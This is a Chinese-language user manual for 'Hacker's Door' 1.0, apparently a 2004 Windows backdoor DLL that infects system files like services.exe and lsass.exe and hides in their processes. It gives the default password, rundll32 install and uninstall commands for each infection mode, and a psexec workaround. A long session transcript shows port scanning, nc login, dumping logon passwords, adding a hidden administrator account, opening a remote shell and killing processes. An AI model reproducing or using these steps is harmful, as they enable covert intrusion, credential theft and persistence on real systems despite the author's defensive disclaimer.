黑客之门(hacker's door) 1.0 版 黑客之门采用的目前一些先进的后门技术,它只有一个dll文件,通过感染系统文件启动自身,被 感染的系统文件大小和日期都不会改变;同时采用线程插入技术,本身没有进程;它本身不开端口,而是重用系统 进程开的任意一个端口,如80,135,139,445等,因此它的隐藏性是非常好的,而且穿透防火墙也是很容易的事情 。这个版本文件不大,只提供一些很有用的命令。目前还没有发现任何工具能查到这个后门,象fport,klist er,RKDetector等查后门的工具都失效了。 申明:本人发布这个工具是为了向大家展示最新的后门技术,使大家能够更好的防范它,同时提高自己的技术, 对于使用本工具造成的后果,本人盖不负责。 (如果你对使用说明中有什么不理解的,可以看动画教程,在我的主页上有, 动画教程中的“0CLOGI0”应该为“NCLOGIN",不知道这个录像软件有什么问题, 把N录成0了) 一、配置 运行HDConfig.exe,选择要进行配置的黑客之门服务器端,默认是hkdoordll.dll,加载的时候会提示你输入密码, 如果你以前没有配置过,那就是初始密码yyt_hac,否则就是你自己配置的密码,然后你就可以修改密码了。这个密码用于 连接和卸载后门。 二、安装 C:\>rundll32 hkdoordll,DllRegisterServer conime.exe 1 上面的方式只感染进程,而不感染系统文件,机器重启或进程退出后门也就退出了,适用于在自己的 机器上做测试,如果你不是做测试,就用下面的安装方式。 其中 hkdoordll是黑客之门服务器端,必须放在system32目录下,可以改名,conime.exe是你要感染的进程 默认是services.exe,如果要感染系统文件,在system32目录下的不用带路径,其它的就要带路径,第一个1是安装方式, 0表示只感染系统文件,1表示只感染进程,2表示感染系统文件,同时感染进程,默认是2; C:\>rundll32 hkdoordll,DllRegisterServer 上面是默认安装方式,它会感染services.exe文件,以便在系统重启时启动后门,同时把自己加载到 services.exe进程中 注意:除了csrss.exe,smss.exe外,其它的系统文件都可以感染 要判断有没有安装成功,就要看system.log里的信息,方法如下: C:\WINNT\system32>type system.log //这个文件的生成会有延时,多type几次 系统找不到指定的文件。 C:\WINNT\system32>type system.log 9/2/2004 10:36:45 l=0 Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=1, Param[0]=C:\WINN T\system32\services.exe,Param[1]=kernel.dll,Param[2]=DllRegisterServer 9/2/2004 10:36:45 l=0 Freeing "kernel.dll": 9/2/2004 10:36:45 l=0 Couldn't free 9/2/2004 10:36:45 l=0 Entering DLL_PROCESS_ATTACH,Process:SERVICES.EXE 9/2/2004 10:36:45 l=0 Begin to start hacker's door.... 9/2/2004 10:36:45 l=0 Loading "kernel.dll": 9/2/2004 10:36:45 l=0 Loaded (0x10000000) 9/2/2004 10:36:45 l=0 The backdoor is installed successfully! 9/2/2004 10:36:45 l=0 UnloadDriver successfully! 9/2/2004 10:36:45 l=0 Begin to start hacker's door.... 9/2/2004 10:36:47 l=0 Start hacker's door successfully! C:\WINNT\system32> 看到“Start hacker's door successfully!”就说明安装成功了,否则就是没有成功, 你可以试试感染别的系统文件。 C:\>rundll32 hkdoordll,DllRegisterServer lsass.exe 上面是感染lsass.exe文件,同时把自己加载到lsass.exe进程中 C:\>rundll32 hkdoordll,DllRegisterServer c:\winnt\explorer.exe 上面是感染explorer.exe文件,同时把自己加载到explorer.exe进程中 注意: 安装成功或失败信息在system32\system.log里有记录。 在终端服务器中,直接安装出现如下错误: C:\WINNT\system32>rundll32 kernel,DllRegisterServer C:\WINNT\system32>type system.log 9/2/2004 10:46:28 l=0 Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=1, Param[0]=C:\WINN T\system32\services.exe,Param[1]=kernel.dll,Param[2]=DllRegisterServer 9/2/2004 10:46:28 l=0 InjectThread:Error CreateRemoteThread,error code:8 9/2/2004 10:46:28 l=0 InjectThread failed! C:\WINNT\system32> 因为在msdn里说 Terminal Services isolates each terminal session by design. Therefore, CreateRemoteThread fails if the target process is in a different session than the calling process. 因此你用下面的方法安装: C:\WINNT\system32>psexec \\127.0.0.1 -u administrator cmd.exe PsExec v1.31 - execute processes remotely Copyright (C) 2001-2002 Mark Russinovich www.sysinternals.com Password: Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. C:\WINNT\system32>rundll32 kernel,DllRegisterServer C:\WINNT\system32>type system.log //这个文件的生成会有延时,多type几次 系统找不到指定的文件。 C:\WINNT\system32>type system.log 9/2/2004 10:36:45 l=0 Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=1, Param[0]=C:\WINN T\system32\services.exe,Param[1]=kernel.dll,Param[2]=DllRegisterServer 9/2/2004 10:36:45 l=0 Freeing "kernel.dll": 9/2/2004 10:36:45 l=0 Couldn't free 9/2/2004 10:36:45 l=0 Entering DLL_PROCESS_ATTACH,Process:SERVICES.EXE 9/2/2004 10:36:45 l=0 Begin to start hacker's door.... 9/2/2004 10:36:45 l=0 Loading "kernel.dll": 9/2/2004 10:36:45 l=0 Loaded (0x10000000) 9/2/2004 10:36:45 l=0 The backdoor is installed successfully! 9/2/2004 10:36:45 l=0 UnloadDriver successfully! 9/2/2004 10:36:45 l=0 Begin to start hacker's door.... 9/2/2004 10:36:47 l=0 Start hacker's door successfully! C:\WINNT\system32> 这样就安装成功了 三、卸载 C:\>rundll32 hkdoordll,DllUnRegisterServer yyt_hac conime.exe 1 这里yyt_hac是连接密码,必须正确,否则不能卸载。其它的参数同安装意义差不多,它根据安装的 方法来卸载后门,上面一行的意思就是把后门从conime.exe卸掉。 C:\>rundll32 hkdoordll,DllUnRegisterServer yyt_hac 上面就是把后门从services.exe进程中卸掉,同时修复被感染的services.exe文件。 C:\>rundll32 hkdoordll,DllUnRegisterServer yyt_hac lsass.exe 上面就是把后门从lsass.exe进程中卸掉,同时修复被感染的lsass.exe文件。 C:\>rundll32 hkdoordll,DllUnRegisterServer yyt_hac c:\winnt\explorer.exe 上面就是把后门从explorer.exe进程中卸掉,同时修复被感染的explorer.exe文件。 卸载成功或失败信息在system32\system.log里有记录。 四、使用 用nc连接被安装后门的机器的任意一个开的端口,这个端口必须能连接上,下面用139端口做例子, 然后输入“NCLOGIN 连接密码”,连接密码默认是yyt_hac,你可以在自己机器上试验,只要一台机器就可以了, 不需要在一台机器上安装,用另一台机器连接。支持多个连接,目前最多3个。 注意:有好多人对这一步不知道怎么做,我打算做一个动画教程 先用xport扫描目标机器开的端口: C:\>xport 192.8.8.1 1-300 -m tcp X-Port v1.3 - command line port scanner Code by glacier http://www.xfocus.org Scanning 192.8.8.1 1-300 ... Remote host: 192.8.8.1 (192.8.8.1) Local address: 192.8.8.1 Scan mode: TCP connect Port count: 300 Thread count: 50 Port 135 is opened: [Unknown service] Port 139 is opened: [Unknown service] Port scan complete, total 300 port, 2 port is opened, use 8012 ms. Match operate system failed. Try to check operate system by netbios ... succeed! Remote operate system: Windows NT 5.0 上面就结果说明135,139端口都可以连接 C:\>nc 192.8.8.1 135 //用nc连接后门,先连接135端口试试 NCLOGIN 123456 This is the server of hacker's door made by yyt_hac, Welcome to http://www.yythac.com,use '?' to get command list HKDOOR>? //得到命令列表 ?-------------------[command],Get command list and the descript of the command hdver-------------------Get the version of hacker's door installed findpass-------------------Get all logon user's username and password open3389-------------------[port] [/r],with 'port' to special termserver 's port ,with '/r' to reboot system opentelnet-------------------[port],open telnet server with [port],default port is 23 pslist-------------------Get process list from remote machine pskill-------------------pID,Kill the process of remote machine getsysinfo-------------------Get the system info from remote machine shutdown-------------------[/r],With '/r' to reboot system,else power off system exitshell-------------------Exit the shell of hacker's door winexec-------------------command,execute command using winexec function openshell-------------------[cmdfile],use cmdfile to create a process to execute command HKDOOR>findpass //查找当前登录用户的密码 The session:0 login information is: Domain:YYT_HAC,User:Administrator,Password:123456 HKDOOR>hdver The version of hacker's door server is 1.0 Welcome to http://www.yythac.com HKDOOR>getsysinfo //得到目标机器的基本信息 Number of CPU:1 Type of CPU:Intel Pentium III or high System Version:Windows nt 5.0 build:2195 Service Pack:4.0 Product type:Windows 2000 Server Computer Name:YYT_HAC System Dir:C:\WINNT\system32 HKDOOR>winexec "net user test /add" //不开命令行窗口执行命令,加一个test的用户 The command execute sucessfully! HKDOOR>winexec "net localgroup administrators test /add" //把test用户加入管理员组 The command execute sucessfully! HKDOOR>openshell //开命令行窗口 Command shell is opened successfully! Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. C:\WINNT\system32> C:\WINNT\system32>cd \ cd \ C:\>net user //查看用户,发现test用户加进来了 net user \\ 的用户帐户 ------------------------------------------------------------------------------- __vmware_user__ Administrator ASPNET Guest IUSR_YYT IWAM_YYT TsInternetUser VUSR_YYT VUSR_YYT_HAC test 命令运行完毕,但发生一个或多个错误。 C:\>dir dir 驱动器 C 中的卷是 windows 卷的序列号是 3C85-544F C:\ 的目录 2004-03-24 12:12 DELL 2004-08-08 10:04 Documents and Settings 2004-09-02 22:20 Downloads 2004-03-22 09:28 DRIVERS 2004-05-30 21:21 drvrtmp 2004-09-02 22:44 hkdoor 2003-08-18 03:02 Inetpub 2004-04-28 16:20 log 2004-05-30 00:02 My Music 2004-09-02 18:17 Program Files 2003-08-16 16:03 WINDOWS 2004-09-02 22:20 WINNT 0 个文件 0 字节 12 个目录 324,079,616 可用字节 C:\>set set ALLUSERSPROFILE=C:\Documents and Settings\All Users.WINNT CommonProgramFiles=C:\Program Files\Common Files COMPUTERNAME=YYT_HAC ComSpec=C:\WINNT\system32\cmd.exe DRIVERNETWORKS=C:\PROGRA~1\COMPUW~1\DRIVER~1\DRIVER~2 DRIVERWORKS=C:\PROGRA~1\COMPUW~1\DRIVER~1\DRIVER~3 NUMBER_OF_PROCESSORS=1 OS=Windows_NT Os2LibPath=C:\WINNT\system32\os2\dll; Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\system32\WBEM PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6 Model 9 Stepping 5, GenuineIntel PROCESSOR_LEVEL=6 PROCESSOR_REVISION=0905 ProgramFiles=C:\Program Files PROMPT=$P$G SystemDrive=C: SystemRoot=C:\WINNT TEMP=C:\WINNT\TEMP TMP=C:\WINNT\TEMP USERPROFILE=C:\Documents and Settings\Default User.WINNT windir=C:\WINNT C:\>ver ver Microsoft Windows 2000 [Version 5.00.2195] C:\>d: d: 设备未就绪。 C:\>f: f: F:\>dir dir 驱动器 F 中的卷是 vc 卷的序列号是 EED5-F051 F:\ 的目录 2004-08-10 14:29 Documents and Settings 2004-03-08 18:07 fore 2004-03-22 20:01 i386 2003-09-07 05:37 My Music 2004-03-22 16:24 NTDDK 2004-06-17 18:15 ON2000 2004-08-19 16:26 ON2000_new 2004-03-26 13:59 Perl 2004-07-28 12:46 Program Files 2004-03-25 09:19 sourcecode 2004-07-28 12:44 WINNT 2004-09-02 22:43 WUTemp 0 个文件 0 字节 12 个目录 921,036,288 可用字节 F:\>pslist //查看目标机器上的进程 ProcessID ProcessName 0 [System Process] 8 System 184 SMSS.EXE 208 CSRSS.EXE 228 WINLOGON.EXE 256 services.exe 268 LSASS.EXE 476 svchost.exe 504 spoolsv.exe 544 msdtc.exe 652 svchost.exe 680 mdm.exe 736 alertsvc.exe 804 navapsvc.exe 884 npssvc.exe 1204 regsvc.exe 1216 mstask.exe 1252 termsrv.exe 1284 vmware-authd.ex 1296 WinMgmt.exe 1324 dfssvc.exe 1336 svchost.exe 1476 explorer.exe 1636 pctspk.exe 1684 hkcmd.exe 1704 Apoint.exe 1648 PFW.exe 1708 prpcui.exe 1732 realsched.exe 1740 ApntEx.exe 1748 internat.exe 1768 conime.exe 1804 navapw32.exe 640 inetinfo.exe 1516 svchost.exe 1856 FlashBack Recor 1816 DG-506C.exe 1580 TASKMGR.EXE 1588 notepad.exe 388 notepad.exe 2024 CMD.EXE 2036 NC.EXE 2004 CMD.EXE F:\>pskill 1684 //杀掉进程id为1684的进程 The process has been killed! F:\>exit //退出命令行窗口 HKDOOR>? //得到命令列表 ?-------------------[command],Get command list and the descript of the command hdver-------------------Get the version of hacker's door installed findpass-------------------Get all logon user's username and password open3389-------------------[port] [/r],with 'port' to special termserver 's port ,with '/r' to reboot system opentelnet-------------------[port],open telnet server with [port],default port is 23 pslist-------------------Get process list from remote machine pskill-------------------pID,Kill the process of remote machine getsysinfo-------------------Get the system info from remote machine shutdown-------------------[/r],With '/r' to reboot system,else power off system exitshell-------------------Exit the shell of hacker's door winexec-------------------command,execute command using winexec function openshell-------------------[cmdfile],use cmdfile to create a process to execute command HKDOOR>exitshell //退出后门 Exit Successfully C:\>nc 192.8.8.1 139 //通过139端口连接后门 NCLOGIN 123456 This is the server of hacker's door made by yyt_hac, Welcome to http://www.yythac.com,use '?' to get command list HKDOOR>openshell Command shell is opened successfully! Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. C:\WINNT\system32> C:\WINNT\system32>rundll32 kernel,DllUnRegisterServer 123456 //卸载后门 The command is too long to recv completely! C:\WINNT\system32>exit HKDOOR>exitshell Exit Successfully C:\> 五、和我联系 如果你发现的bug,请和我联系,最好说明使用的环境,同时把system32\system.log发给我。 个人主页:http://www.yythac.com Email:webmaster@yythac.com yyt_hac@163.com QQ:47090005